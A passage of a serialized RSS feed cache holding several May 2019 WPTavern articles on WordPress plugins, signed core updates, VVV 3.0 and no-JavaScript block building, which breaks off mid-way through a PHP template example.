editor</li>\n<li>to-do style using checkbox and strike through</li>\n<li>Markdown support for RichText API</li>\n<li>uppercase and indent formats</li>\n</ul>\n<p>I asked Carandang if he has any plans to add an option for paring down Gutenberg to the bare essentials with an interface more focused on writing. He said it is a possibility but is optimistic that the Gutenberg team may work to solve this common complaint in core.</p>\n<p>&#8220;I&#8217;ve thought of that, specially when my writer colleague asked me about it,&#8221; he said. &#8220;But I think it&#8217;s not time for that yet. I&#8217;ll wait for more Gutenberg releases before deciding if it&#8217;s needed in EditorsKit.&#8221;</p>\n<p>Carandang said he doesn&#8217;t plan to add any custom blocks to EditorsKit. His goal is to extend blocks for users to have options that they can utilize globally, while using whichever blocks plugin(s) they prefer. The plugin currently has no revenue model but he may pursue monetization in the future.</p>\n<p>&#8220;At of the moment, I&#8217;m more focused on building the plugin features rather than monetization, but extensions may come in a year or two when Gutenberg is more stable,&#8221; Carandang said. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 21 May 2019 14:58:57 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:13;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:89:"WPTavern: CoBlocks 1.9.5 Merges Block Gallery Plugin into Collection, Adds New Form Block";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89869";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:99:"https://wptavern.com/coblocks-1-9-5-merges-block-gallery-plugin-into-collection-adds-new-form-block";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:4217:"<p><a href="https://coblocks.com/" rel="noopener noreferrer" target="_blank">CoBlocks</a>, a collection of page builder blocks that was recently <a href="https://wptavern.com/godaddy-acquires-themebeans-coblocks-block-gallery-and-block-unit-tests" rel="noopener noreferrer" target="_blank">acquired by GoDaddy</a>, has added four new blocks in version 1.9.5. This is the first major release since the plugin was acquired from Rich Tabor and his co-creators. Tabor now heads up a WordPress Experience team at GoDaddy where CoBlocks&#8217; development continues.</p>\n<p>This release merges the three gallery blocks (Masonry, Stacked, and Carousel) from the <a href="https://wordpress.org/plugins/block-gallery/" rel="noopener noreferrer" target="_blank">Block Gallery</a> plugin into CoBlocks. There is a migration path for users to convert their existing Block Gallery blocks to CoBlocks&#8217; gallery blocks. Block Gallery is still available on WordPress.org as a separate plugin with 5,000 active installs, which is actually more installs than CoBlocks (4,000). Tabor said his team is still discussing whether or not it will remove the plugin in the future.</p>\n<p>&#8220;CoBlocks is already a suite of blocks that level-up the block editor, bringing in those gallery blocks into the core plugin removes a barrier for folks who already have CoBlocks installed,&#8221; Tabor said. &#8220;Instead of folks having to install, activate, and maintain two plugins &#8211; only one is needed. On top of that, it’s far easier to maintain them collectively under one roof, as many of the components are shared between the two plugins.&#8221; </p>\n<p>In addition to merging the gallery blocks, CoBlocks 1.9.5 introduces a new Form block that allows users to customize a simple form directly within the editor. The block includes name, email, and message form fields but does not offer the ability to create new fields or change them to different types of fields. Users can set any of the fields as required using a toggle inside the block preview. For anything beyond these capabilities, a dedicated forms plugin would be required.</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2019/05/Screen-Shot-2019-05-20-at-7.13.40-PM.png?ssl=1"><img /></a></p>\n<p>CoBlocks 1.9.5 also adds official support for Gutenberg 5.7 and includes more than a dozen tweaks and fixes. </p>\n<p>Tabor said his team is identifying further solutions that can be leveraged to make page building in WordPress more simple. CoBlocks is rapidly becoming a another one-stop shop for the mostly commonly used page building blocks. </p>\n<p>&#8220;We&#8217;re looking at how to make adding maps easier (a better Map block) and developing a system that enables restaurants to build out menus,&#8221; Tabor said.</p>\n<p>Several other block collections already offer a map block and/or a similar suite of page building functionality, such as <a href="https://wordpress.org/plugins/ghostkit/" rel="noopener noreferrer" target="_blank">Ghost Kit</a>, <a href="https://wordpress.org/plugins/atomic-blocks/" rel="noopener noreferrer" target="_blank">Atomic Blocks</a>, <a href="https://wordpress.org/plugins/stackable-ultimate-gutenberg-blocks/" rel="noopener noreferrer" target="_blank">Stackable</a>, and <a href="https://wordpress.org/plugins/editor-blocks/" rel="noopener noreferrer" target="_blank">Editor Blocks</a>. Collections seem to be the best way to offer multiple small UI elements, especially if they are all designed to be complimentary in style. Plugin authors differentiate their collections from the others with additional block options, support, complimentary themes, and immediate compatibility with the Gutenberg plugin. </p>\n<p>At the moment, there is little incentive for developers to maintain functionality as separate plugins, but WordPress&#8217; planned single <a href="https://wptavern.com/wordpress-explores-proposal-for-new-block-directory-to-host-single-block-plugins" rel="noopener noreferrer" target="_blank">block directory</a> may change the way blocks are packaged for optimal discovery. For now, it&#8217;s a race to see which block collection can offer the most useful suite with the most intuitive UI. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 21 May 2019 00:57:04 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:14;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:66:"WPTavern: WordPress 5.2 Improves the Security of Automatic Updates";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89913";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:77:"https://wptavern.com/wordpress-5-2-improves-the-security-of-automatic-updates";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:4791:"<p><a href="https://wptavern.com/wordpress-5-2-jaco-released-includes-fatal-php-error-protection-and-a-recovery-mode">WordPress 5.2</a>, released earlier this month, added the first step towards fully secure updates with offline digital signatures. Scott Arciszewski, Chief Development Officer for Paragon Initiative Enterprises, <a href="https://paragonie.com/blog/2019/05/wordpress-5-2-mitigating-supply-chain-attacks-against-33-internet"></a><a href="https://paragonie.com/blog/2019/05/wordpress-5-2-mitigating-supply-chain-attacks-against-33-internet">explains</a><a href="https://paragonie.com/blog/2019/05/wordpress-5-2-mitigating-supply-chain-attacks-against-33-internet"> how it works</a> and how developers can migrate away from mcrypt to libsodium.</p>\n\n\n\n<blockquote class="wp-block-quote"><p>When your WordPress site installs an automatic update, from version 5.2 onwards, it will first check for the existence of an <code>x-content-signature</code> header. </p><p>If one isn&#8217;t provided by the update server, your WordPress site will instead query for a <code>filenamehere.sig</code> file.</p><p>No matter how it&#8217;s delivered, the signatures are calculated using <a href="https://latacora.micro.blog/2018/04/03/cryptographic-right-answers.html#asymmetric-signatures">Ed25519</a> of the SHA384 hash of the file&#8217;s contents. The signature is base64-encoded for safe transport.</p><cite>Scott Arciszewski</cite></blockquote>\n\n\n\n<p>The WordPress core development team manages the signing or secret keys. WordPress 5.2 contains a signing key that expires on April 1, 2021. The verification key or public key is used to decipher the secret key. This value determines the validity of the signature. </p>\n\n\n\n<p>Since the feature is still in an experimental phase, WordPress 5.2 <a href="https://core.trac.wordpress.org/ticket/39309#comment:85">allows an update to occur</a> if a soft error or invalid signature is encountered. This is to prevent more severe errors from causing the user to be locked out of the update process until a manual update is applied. The team will use the reported error information to improve the signature checking process. </p>\n\n\n\n<p>The digital signatures are only supported for core updates with Themes and Plugins to follow in a later release. It&#8217;s also likely that the team will include separate keys for core releases, plugins, themes, translations, etc. to allow for more fine-grained control. </p>\n\n\n\n<p>Digital signatures applied to WordPress core updates is an important milestone because it prevents users from unknowingly downloading updates from malicious sources. </p>\n\n\n\n<p>For example, without digital signatures, if the server or servers that house the core update files were compromised, a false update could be sent to millions of sites. In 2016, WordFence <a href="https://www.wordfence.com/blog/2016/11/hacking-27-web-via-wordpress-auto-update/">explained how this scenario could play out</a> when they publicized a security vulnerability they discovered with api.wordpress.org.</p>\n\n\n\n<h2>Persistence Pays Off</h2>\n\n\n\n<p>In early 2017, Arciszewski <a href="https://web.archive.org/web/20170214062414/https://medium.com/@CiPHPerCoder/stopmullware-on-the-security-of-27-of-the-websites-on-the-internet-298a7e5b6871">published a plea</a> to Matt Mullenweg to focus on securing WordPress&#8217; automatic updates system by using secure cryptographic signatures. Mullenweg responded to the article with <a href="https://medium.com/@photomatt/wordpress-and-update-signing-51501213e1">one of his own</a> on Medium. </p>\n\n\n\n<blockquote class="wp-block-quote"><p>We will at some point; as said above it’s a good idea — can’t hurt, might help. There are, however, some more important security issues in front of it, that impact millions of sites in the real world, so we are prioritizing those issues above a nice-to-have, defense in-depth effort.</p><cite>Matt Mullenweg</cite></blockquote>\n\n\n\n<p>Arciszewski has spent at least <a href="https://core.trac.wordpress.org/ticket/25052">six years</a> trying to convince the core team to implement digitally signed updates. Four months ago, Gary Pendergast, WordPress core developer, <a href="https://core.trac.wordpress.org/ticket/39309#comment:53">responded to the ticket</a> saying that the feature fell in line with the <a href="https://make.wordpress.org/core/2018/12/08/9-priorities-for-2019/">list of WordPress priorities</a> planned for 2019 and beyond. Pendergast laid out a plan and with a confirmed commitment to landing it in core, Arciszewski worked with the core team to make it a reality. </p>\n\n\n\n<p>Millions of WordPress sites are on their way to becoming more secure thanks to the persistence and efforts of Arciszewski and the WordPress core team.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 20 May 2019 21:28:27 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:15;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:56:"WPTavern: Jetpack Opens Signup for Membership Block Beta";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89859";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:67:"https://wptavern.com/jetpack-opens-signup-for-membership-block-beta";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1749:"<p>Jetpack has opened a <a href="https://docs.google.com/forms/d/e/1FAIpQLSciARVuZM-q1J9l9eCRdtSFFhtBsVQbIAzJfjUdC2vKKrQXDA/viewform" rel="noopener noreferrer" target="_blank">signup</a> for the beta of its upcoming Membership feature in order to collect feedback from potential testers. The changelog for version 7.3, released two weeks ago, hinted at <a href="https://wptavern.com/new-membership-block-coming-to-jetpack-site-health-and-debug-info-added-to-version-7-3#comment-290598" rel="noopener noreferrer" target="_blank">a new Membership block coming to the plugin</a>. The work in progress was added behind the JETPACK_BETA_BLOCKS constant, presumably in preparation for wider testing.</p>\n<p>Based on the feature&#8217;s description on GitHub, the first iteration will function like a recurring payment/donation button that uses Stripe as the payment gateway. In this case, &#8220;membership&#8221; might be a misnomer for the feature. The wording on the beta signup page lends to the confusion: &#8220;WordPress.com is currently preparing a feature that will let you enable subscriptions on your site.&#8221; </p>\n<p>At the moment, it appears that the Jetpack team hasn&#8217;t fully decided what this feature will become and seems open to seeing where it will go. Beta testers will likely refine the direction of the block. If you have an interest in using Jetpack&#8217;s membership capabilities in the future and want to shape its development, you can <a href="https://docs.google.com/forms/d/e/1FAIpQLSciARVuZM-q1J9l9eCRdtSFFhtBsVQbIAzJfjUdC2vKKrQXDA/viewform" rel="noopener noreferrer" target="_blank">sign up</a> for the beta by providing your WordPress.com login and a description of your needs and expectations for the feature.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sat, 18 May 2019 04:09:53 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:16;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:103:"WPTavern: Jetpack Retires Proofreading Module, Time to Find A New Grammar and Spellchecking Alternative";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89861";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:113:"https://wptavern.com/jetpack-retires-proofreading-module-time-to-find-a-new-grammar-and-spellchecking-alternative";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2672:"<p>Jetpack 7.3 was <a href="https://wptavern.com/new-membership-block-coming-to-jetpack-site-health-and-debug-info-added-to-version-7-3">released last week</a> and if you didn&#8217;t read the <a href="https://wordpress.org/plugins/jetpack/#developers">changelog</a>, you may have missed that the spelling and grammar checking module that uses <a href="https://www.afterthedeadline.com/">After the Deadline</a> has been retired. </p>\n\n\n\n<blockquote class="wp-block-quote"><p>&#8220;Grammar and Spelling: Remove from Jetpack. We’ve chekced the spelling alot over the years, but now time to retire.&#8221;</p><cite>From the Jetpack 7.3 Changelog</cite></blockquote>\n\n\n\n<p><a href="https://wordpress.org/support/topic/spelling-and-grammar-check-no-longer-available/">According to James Huff</a>, an Automattician and volunteer moderator, the module was removed in favor of better options being available. </p>\n\n\n\n<p>&#8220;We removed the feature as it has become a bit redundant lately,&#8221; he said. &#8220;Most major web browsers have some form of this already built-in, and  free extensions like <a href="http:// https://www.grammarly.com/">Grammarly</a> are making huge strides in the field. It felt like the right time to back out of that field and focus more on everything else we offer.&#8221;</p>\n\n\n\n<p>After the Deadline is a service that was created in 2008 by Raphael Mudge and was <a href="https://www.afterthedeadline.com/">acquired by Automattic in 2009</a>. It not only checked for grammar and spelling errors, it did so contextually and provided style suggestions. Mudge moved on from Automattic in 2010 and the service has seemingly operated on auto-pilot. </p>\n\n\n\n<div class="wp-block-image"><img />After the Deadline Proofreading Button in the Calypso Editor</div>\n\n\n\n<p>Between 2010 and 2011, the Jetpack team added support for AtD with a proofreading module. Unfortunately, the proofreading button that was available in the Classic editor was not ported over to Gutenberg. This issue was <a href="https://github.com/Automattic/wp-calypso/issues/28550">originally reported</a> on GitHub in 2018 but <a href="https://github.com/Automattic/wp-calypso/issues/32798">was closed</a> 14 days ago due to AtD support being removed from Jetpack, WordPress.com, and Calypso. </p>\n\n\n\n<p>I&#8217;ve used After the Deadline for 10 years and although there&#8217;s no official statement on when the service will be retired, the writing appears to be on the wall.</p>\n\n\n\n<p>I plan to give Grammarly a try but I&#8217;ll miss After the Deadline. What grammar and spellchecking services or software do you use and recommend as an alternative to After the Deadline?</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sat, 18 May 2019 00:00:23 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:17;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:81:"WPTavern: VVV 3.0 Introduces New Ubuntu 18 Box, Support for VVV 2 is Discontinued";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89824";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:91:"https://wptavern.com/vvv-3-0-introduces-new-ubuntu-18-box-support-for-vvv-2-is-discontinued";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:6899:"<p><a href="https://varyingvagrantvagrants.org/blog/2019/05/15/vvv-3-0-0.html" rel="noopener noreferrer" target="_blank">VVV 3.0</a> was released this week, introducing a new Ubuntu 18.04 LTS box. The project&#8217;s previous versions used Ubuntu 14, which has now reached end of life (EOL). </p>\n<p>Support for VVV 2 is now discontinued, due to an unforeseen complication with its PHP dependencies. Ondřej Surý, who maintains all the PHP packages VVV uses, deleted the unsupported ones in response to Ubuntu 14 reaching EOL. VVV contributors had set up a package mirror but only 70% of them were mirrored. As a result, VVV 2 installs were no longer able to provision. VVV maintainers have stopped supporting it and it will not receive any fixes or updates in the future. </p>\n<p><a href="https://tomjn.com/" rel="noopener noreferrer" target="_blank">Tom Nowell</a> said he and his fellow VVV maintainers had &#8220;a mini- Ubuntu 14-apocalypse of sorts when it reached EOL,&#8221; so the new Ubuntu 18 box is a big bump up that should cover the project until 2024. It includes Kernel improvements that make Ubuntu faster when used in a virtual machine. The 3.0 update came out of necessity but it includes changes the team had already intended to make.</p>\n<p>&#8220;We wanted to move from 14 to 18 for a long time anyway, and Anton Vanyukov had written a PR starting that, so we went ahead,&#8221; Nowell said. &#8220;The internals are based on VVV 2 so 99% of things should still work exactly the same (but a bit better and a little faster).&#8221; </p>\n<p>VVV now uses a leaner custom built box, but it requires users to destroy their VMs in order to update. Directions for updating to 3.0 are in the release <a href="https://varyingvagrantvagrants.org/blog/2019/05/15/vvv-3-0-0.html" rel="noopener noreferrer" target="_blank">post</a>. This destroys the database but VVV creates its own backups that can be quickly restored with a simple command.</p>\n<p>Another major change in 3.0 is that VVV no longer stores MariaDB data inside the VM. The data has been relocated to database/data, which has the added benefit of being preserved when using the <code>vagrant destroy</code> command.</p>\n<p>The release also includes quite a bit of restructuring with the removal of the /vagrant mapped folder that eliminates overlapping vagrant shared folders. In addition to several dozen smaller improvements, VVV 3.0 adds a new teddy bear when it finishes provisioning.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2019/05/Screenshot-2019-05-17-at-14.51.27.png?ssl=1"><img /></a></p>\n<h3>The Future of VVV: Version 4 to Focus on User-Friendly Improvements to Provisioning</h3>\n<p>Although VVV doesn&#8217;t yet have a user-friendly interface and requires the use of a terminal, Nowell said the team is working towards making it easier to use. For now, VVV distinguishes itself from other development apps, like Local and DesktopServer, by being a community project that is free from commercial interests.</p>\n<p>&#8220;VVV does a lot of the things DesktopServer does but for free,&#8221; Nowell said. &#8220;We don’t charge $99 for PHP7, SSL, or WP CLI. VVV won’t up sell you on hosting either, and you can have as many sites as you want out of the box.</p>\n<p>&#8220;A lot of people like Local for using Docker containers, but all those containers are inside a boot2docker virtual machine using VirtualBox. They have a pretty UI, and it’s great if you use FlyWheel as a host, but it’s not the easiest to get set up for contributing to WordPress.&#8221;</p>\n<p>VVV has a specific pre-built version that provides a development environment <a href="https://make.wordpress.org/core/handbook/tutorials/installing-a-local-server/installing-vvv/" rel="noopener noreferrer" target="_blank">optimized for contributing to WordPress core</a>. It can be copied onto a USB drive and set up on a user&#8217;s machine, even while offline. This pre-built version is often handed out at the beginning of contributor days at WordCamps.</p>\n<p>&#8220;We’re a community driven project,&#8221; Nowell said. &#8220;People going to contributor days use VVV &#8211; the entire package can be pre-built and put on a USB stick and it runs in a lot more places than some of the docker based setups that some devs use. Until recently you needed to upgrade to Windows 10 Pro to be able to use Docker on Windows. Imagine 100 contributors downloading Windows 10 iso files over conference wifi.&#8221;</p>\n<p>VVV maintainers and contributors are working on releasing version 3.1 in the next month with all the little things they want to polish. Nowell said they have the basis for what they want to accomplish in version 4. Instead of waiting for VVV to install and configure PHP/MySQL/nginx/etc, the install process will happen on a server somewhere and the user will be able to just download the result, similar to how VVV is pre-built for contributor days.</p>\n<p>Nowell identified the major impacts of taking this approach:</p>\n<ul>\n<li>It doesn’t matter if provisioning works for you, we’re doing that for you.</li>\n<li>If someone makes a big slip up, that’s ok, users get the last working build and see nothing.</li>\n<li>Getting everything set up should be much much faster, it will remove about 70-80% of the startup time for a lot of users.</li>\n</ul>\n<p>Nowell said the general goal is to &#8220;just make it more fun to use&#8221; but his personal goal is for people to be able to use VVV without ever touching a terminal. He thinks it can be done with an <a href="https://electronjs.org/" rel="noopener noreferrer" target="_blank">Electron</a> wrapper and has performed a few experiments with it. In the past, he spent a lot of time improving the messaging for provisioning errors, but the days of trying to preempt those problems may soon be drawing to a close.</p>\n<p>&#8220;Why fix provisioning for users if they never have to do it in the first place?&#8221; Nowell said. &#8220;I’d say VVV 4 will come pre-built so it only builds the sites themselves, like how you can grab a docker image with PHP/MySQL already setup, and fill it with a site. Eventually the dashboard itself can become an Electron app where you can turn VVV on/off and adds sites.&#8221;</p>\n<p>VVV maintainers have some ambitious plans for version 4 that will make it available to a wider population of WordPress users and save existing users more time on startup. The project needs more testers and feature requests. Contributions to the main project are <a href="https://github.com/Varying-Vagrant-Vagrants/" rel="noopener noreferrer" target="_blank">welcome on GitHub</a>. Developers and testers can also contribute to the <a href="https://github.com/WordPress/meta-environment" rel="noopener noreferrer" target="_blank">meta environment</a> to improve how it works with WordCamp sites and WordPress.org.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 17 May 2019 21:11:15 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:18;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:84:"WPTavern: Block building without JavaScript: Testing ACF, Block Lab, and Lazy Blocks";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89780";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:92:"https://wptavern.com/block-building-without-javascript-testing-acf-block-lab-and-lazy-blocks";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:19359:"<p>Not everyone is able or willing to build blocks in JavaScript just yet, and sometimes you have to install three or four block collections until you find the blocks you would like. </p>\n\n\n\n<p>There is a third way: plugins that create the blocks for you from a set of specific custom fields, with a template to control the frontend display of the blocks. The three most popular options for doing this include: <a href="https://getblocklab.com/">Block Lab</a>, <a href="https://www.advancedcustomfields.com/resources/blocks/">ACF (Advanced Custom Fields)</a> and <a href="https://lazyblocks.com/">Lazy Blocks</a>. </p>\n\n\n\n<p>My use case for this test is a small task I set out to accomplish with each of the plugins &#8211; to create a block for team members of a company that includes the following fields: first name, last name, headshot, bio, phone number, and email address and use the block on a page in a two-column display with two team members. </p>\n\n\n\n<p>For each plugin I will demonstrate</p>\n\n\n\n<ul><li>how to create the Fieldgroup, </li><li>how to create the template for the frontend and </li><li>how to use the blocks to create a team page. </li></ul>\n\n\n\n<p>I used <a href="https://localbyflywheel.com/">Local by Flywheel </a>as my local development tool. The test site ran on <a href="http://wordpress.org/download">WordPress 5.1.1</a>, <a href="http://wordpress.org/plugins/gutenberg">Gutenberg 5.4</a> and the <a href="https://wordpress.com/theme/business">Business Theme</a> from WordPress.com </p>\n\n\n\n<p>After reading this post you will be able to select the plugin that fits your needs.</p>\n\n\n\n<h2>Creating a Team Block with Block Lab</h2>\n\n\n\n<p>Members of the  <a href="https://xwp.co/">XWP team</a> built Block Lab and it is available as a free plugin with a commercial version. I used Block Lab first, installed the plugin and then started a new block. </p>\n\n\n\n<p>Here is the video on how to set-up the fields. </p>\n\n\n\n<div class="wp-block-embed__wrapper">\n\n</div>\n\n\n\n<img src="https://lh3.googleusercontent.com/iRgsUvVQRzimcktaj1845VVoYcWmt0THZv56Xrn1CGF549wAA7iC1DoQNr0-ZhZnPQ6iXk7LULp6PFuazN-KfBvoaNvPFf3Cobsdwt6HBhT6HbKOz9tQ7tq-y5oC0W6uyLL9_RY3" alt="" />\n\n\n\n<img src="https://lh3.googleusercontent.com/EanmmdAsFYGbcXr1ygb8FHMmRWUTVTH1stMIqg0YnZ8XIPziPLfv9fmC5dKWAnZyNkxOShxuzueW2ByPZOaJobqWlqORw35pk3hEBDx7UhjdB05HU0yf8enxtqIBY1TONAJWELlt" alt="" />\n\n\n\n<p>The next step is setting up the block template </p>\n\n\n\n<p>When I looked at the expected location, the template will be made part of the theme directory in a subfolder called /blocks/ That’s something a developer needs to remember, as there is some content lock-in when switching themes. </p>\n\n\n\n<p>To create the template, I opened my code editor, created the file block-team-member.php, and added the HTML + and minimal PHP to reference the fields. </p>\n\n\n<pre class="brush: php; title: ; notranslate">\n&lt;h2&gt;\n&lt;?php block_field( ''first-name'' );?&gt; \n&lt;?php block_field( ''last-name'' );?&gt;\n&lt;/h2&gt;\n&lt;p&gt;&lt;img class="teamphoto" src="&lt;?php 